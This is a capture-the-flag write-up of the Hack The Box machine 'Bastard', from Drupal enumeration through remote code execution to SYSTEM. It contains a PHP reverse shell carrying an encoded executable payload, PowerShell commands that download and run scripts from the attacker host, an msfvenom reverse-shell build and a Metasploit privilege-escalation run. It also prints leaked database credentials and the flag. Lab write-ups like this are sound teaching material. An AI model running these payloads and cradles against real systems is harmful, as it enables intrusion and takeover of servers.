Bastard @ hackthebox

Bastard is a Windows machine with interesting Initial foothold. There is some PHP knowledge needed, although the changes need to be done for the exploit code are pretty minimal. There are more than one way to get into machine!

Enumeration

Lets start nmap:

┌─[root@parrot]─[/home/luka/Desktop/htb/Bastard/nmap]
└──╼ #nmap -sC -sV -n -oA nmap 10.10.10.9
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-24 21:06 CET
Nmap scan report for 10.10.10.9
Host is up (0.054s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.23 seconds

We see that there are two RPC ports open, which don’t seem to be exploitable but there is a web application running on port 80. It’s running drupal

Bastard @ hackthebox

I’d be wise to start gobuster/dirbuster and let it to its job in the background. I will start the gobuster: /home/luka/tools/gobuster/gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u 10.10.10.9 2>/dev/null
(Gobuster: https://github.com/OJ/gobuster)

Through the http-server-header we can enumerate which OS is the machine running. According to that header entry it could be either Windows 7 or Windows Server 2008 R2
(Source: https://en.wikipedia.org/wiki/Internet_Information_Services

Bastard @ hackthebox

Another interesting information returned from nmap is information about http-robots.txt and disallowed entries.

Checking the files/directories doesn’t reveal much, although CHANGELOG.txt reveals the Version information. It is 7.54.

┌─[root@parrot]─[/home/luka/Desktop/htb/Bastard/nmap]
└──╼ #curl -s http://10.10.10.9/CHANGELOG.txt | head -n 2

Drupal 7.54, 2017-02-01

Other locations where the version could have been stored would be

Exploitation

Searching the searchsploit for Drupal 7.5, we do get some results back. For the first two we need to be authenticated (you will see later that we actually can get authenticated stealing the session key cookie. In theory we should be able to get Drupalgeddon3 to work)

┌─[root@parrot]─[/home/luka/Desktop/htb/Bastard/nmap]
└──╼ #searchsploit drupal 7.5
------------------------------------------------------ ----------------------------------------
 Exploit Title                                        |  Path
                                                      | (/usr/share/exploitdb/)
------------------------------------------------------ ----------------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remot | exploits/php/webapps/44542.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remot | exploits/php/webapps/44557.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupal | exploits/php/webapps/44449.rb
------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
Papers: No Result

The third one looks more promising though.

┌─[root@parrot]─[/home/luka/Desktop/htb/Bastard/nmap]
└──╼ #searchsploit -x 44449
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449/
     Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
File Type: Ruby script, ASCII text, with CRLF line terminators

But problem with this script/exploit (CVE-2018-7600) is that it needs credentials as well, that we don’t have, this is error that i’m seeing

Bastard @ hackthebox

Using google i have found another exploit that doesn’t seem to need any credentials => 41564 (https://www.exploit-db.com/exploits/41564).

Bastard @ hackthebox

Exploit can be copied directly using searchsploit -m 41564 into working directory. Exploit and vulnerability itself is described really well here: https://www.ambionics.io/blog/drupal-services-module-rce

There are about 3 lines that need to be corrected before you can run the script. You will see that there is comment sign missing (#). You will have to enter the IP (host) as change the endpoint_path to “/rest” as well. If you are asking yourself what this /rest or endpoint_path does, you should read the exploit explanation in the link above. Gobuster has found many subfolders and /Rest was one of them and is fitting into the scheme.

I also had to install php-curl with “apt install php-curl”.

Bastard @ hackthebox

If you are recieving any errors, just read those carefully.

If you’d successfully ran the script, you should see two files that were created. (i pasted their content below as well.)

┌─[root@parrot]─[/home/luka/Desktop/htb/Bastard/Exploitation]
└──╼ #php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce


#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/dixuSOspsOUU.php


┌─[root@parrot]─[/home/luka/Desktop/htb/Bastard/Exploitation]
└──╼ #cat session.json 
{
    "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
    "session_id": "9sf6ZnGi3HE4fzyncIFjYmd7gYptwWfFaJktujdYQZU",
    "token": "-LO9HbzmGh4tqIXRQwnQMjA0Uz0owWYvwDewo99gIAQ"
}

┌─[root@parrot]─[/home/luka/Desktop/htb/Bastard/Exploitation]
└──╼ #cat user.json 
{
    "uid": "1",
    "name": "admin",
    "mail": "drupal@hackthebox.gr",
    "theme": "",
    "created": "1489920428",
    "access": "1492102672",
    "login": 1553538083,
    "status": "1",
    "timezone": "Europe\/Athens",
    "language": "",
    "picture": null,
    "init": "drupal@hackthebox.gr",
    "data": false,
    "roles": {
        "2": "authenticated user",
        "3": "administrator"
    },
    "rdf_mapping": {
        "rdftype": [
            "sioc:UserAccount"
        ],
        "name": {
            "predicates": [
                "foaf:name"
            ]
        },
        "homepage": {
            "predicates": [
                "foaf:page"
            ],
            "type": "rel"
        }
    },
    "pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"

We get quite a few information. Username + hashed password and Session Token. Bruteforcing the password hash would take to long and it makes no sense, since we have a session name + id.

We can set the script to send the packets to Burp and this redirects the connection to 10.10.10.9. This way we will see exactly what is being sent and received from the Bastard machine. (again, you can check the exploit explanation for more details.)

Bastard @ hackthebox
Bastard @ hackthebox

Apart from getting this two files, there is also a new file is being created on the Bastard machine. It’s empty, but we could place some code/shell/script in there.

Bastard @ hackthebox

Or we can edit the cookie to get into Admin panel.

Bastard @ hackthebox
Bastard @ hackthebox

Start the PHP Filter Module:

Bastard @ hackthebox

… And upload the reverse shell

This is a payload for reverse shell that i used (https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php)

<?php
header('Content-type: text/plain');
$ip   = "10.10.14.68"; //change this 
$port = "5555"; //change this
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir =".\\";
chdir($tmpdir);
$res .= "Using dir : ".$tmpdir;
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);
			            
?>
Bastard @ hackthebox

After starting the NC listener and after running the article i’ve got a shell

┌─[✗]─[luka@parrot]─[~/Desktop/htb]
└──╼ $nc -lnvp 5555
listening on [any] 5555 ...
connect to [10.10.14.68] from (UNKNOWN) [10.10.10.9] 62231
b374k shell : connected

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>systeminfo
systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46
System Boot Time:          25/3/2019, 4:23:37
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~1996 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~1996 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.048 MB
Available Physical Memory: 1.543 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.591 MB
Virtual Memory: In Use:    504 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

C:\inetpub\drupal-7.54>whoami                                                                                                                                                                   
whoami
nt authority\iusr

Enumeration and Privilege Escalation

If we run dir /s settings.php we should find the location of the main Drupal config file. We can find database credentials there.

      'database' => 'drupal',                                                                     
      'username' => 'root',                                                                                                                                                                     
      'password' => 'mysql123!root',                                                                                      
      'host' => 'localhost',                                              
      'port' => '',                                                             
      'driver' => 'mysql',                                                    
      'prefix' => '',     

We can retrieve the user Flag as well:

C:\Users\dimitris\Desktop>type user.txt
type user.txt
*deleted*

For Enumeration i will use PowerUp.ps1 script from the Empire. To make it standalone we have to call the function at the end (just add Invoke-AllChecks to the end of the script. I also copied it into my working directory).

Bastard @ hackthebox

To transfer the file onto the Windows machine i used python -m SimpleHTTPServer. I ran the following to run the file. Powershell will only load and execute the script.

C:\inetpub\drupal-7.54>echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.68:8000/PowerUp.ps1') | powershell -noprofile -

You can also download it using Powershells DownloadFile(“remote_file”,”local_file”)

C:\inetpub\drupal-7.54>echo IEX(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.68:8000/PowerUp.ps1', 'PowerUp.ps1') | powershell -noprofile -

From here i’ve tried different stuff. I created meterpreter file and uploaded it, to get meterpreter session. I did that to run local exploit suggester. This was obviously an overkill and i would’t do it again ;), but anyways – here it is:

┌─[✗]─[root@parrot]─[/home/luka/Desktop/htb/Bastard/PrivilegeEscalation]                      
└──╼ #msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.68 LPORT=6666 -f exe -o me
terpreter6666.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload        
[-] No arch selected, selecting arch: x64 from the payload                                    
No encoder or badchars specified, outputting raw payload                                      
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: meterpreter6666.exe
┌─[root@parrot]─[/home/luka/Desktop/htb/Bastard/PrivilegeEscalation]                          
└──╼ #file meterpreter6666.exe
meterpreter6666.exe: PE32+ executable (GUI) x86-64, for MS Windows 
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description                                               
   ----  ---------------  --------  -----------                                               


Payload options (windows/x64/meterpreter/reverse_tcp):                                        

   Name      Current Setting  Required  Description                                           
   ----      ---------------  --------  -----------                                           
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.68      yes       The listen address (an interface may be specified)    
   LPORT     6666             yes       The listen port                                       


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) >
[*] Sending stage (206403 bytes) to 10.10.10.9
[*] Meterpreter session 1 opened (10.10.14.68:6666 -> 10.10.10.9:62260) at 2019-03-25 23:07:27
+0100
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.9 - Collecting local exploits for x64/windows...
[*] 10.10.10.9 - 11 exploit checks are being tried...
[+] 10.10.10.9 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.9 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.9 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.9 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed

So we do get some exploit suggestions back, but i couldn’t get any of the exploits to work. I even tried the rotten potato etc. but no luck with that. Maybe someday i will try that exploit again,…

Next i tried another local exploit enumeration script called sherlock. This gave me different results.

C:\inetpub\drupal-7.54>echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.68:8000/Sherlock.ps1') | powershell -noprofile -
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.68:8000/Sherlock.ps1') | powershell -noprofile -
                                        
                     
                                 
Title      : User Mode to Ring (KiTrap0D)              
MSBulletin : MS10-015      
Title      : User Mode to Ring (KiTrap0D)                                                                                                                                         [39/1969]
MSBulletin : MS10-015
CVEID      : 2010-0232                                                     
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems        

Title      : Task Scheduler .XML                                                
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888                    
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053                         
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems          

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881                                                                            
Link       : https://www.exploit-db.com/exploits/31576/                                           
VulnStatus : Not supported on 64-bit systems                                                       
                                                                                                
Title      : TrackPopupMenu Win32k Null Pointer Dereference                                      
MSBulletin : MS14-058                                 
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
                                            
Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable                                                                                                           
                                                                                                                   
Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Not Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Not Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
             tml
VulnStatus : Not Vulnerable

ms15_051 worked out of the box!

msf5 exploit(windows/local/ms15_051_client_copy_image) > options

Module options (exploit/windows/local/ms15_051_client_copy_image):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  7                yes       The session to run this module on.


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.68      yes       The listen address (an interface may be specified)
   LPORT  8888             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows x64

msf5 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.14.68:8888 
[*] Launching notepad to host the exploit...
[+] Process 1376 launched.
[*] Reflectively injecting the exploit DLL into 1376...
[*] Injecting exploit into 1376...
[*] Exploit injected. Injecting payload into 1376...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 8 opened (10.10.14.68:8888 -> 10.10.10.9:62307) at 2019-03-26 22:25:03 +0100

C:\Windows\system32>whoami
whoami
nt authority\system

We’ve got a root shell and we can read the root flag

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
4bf12b963da1b30cc93496f617f7ba7c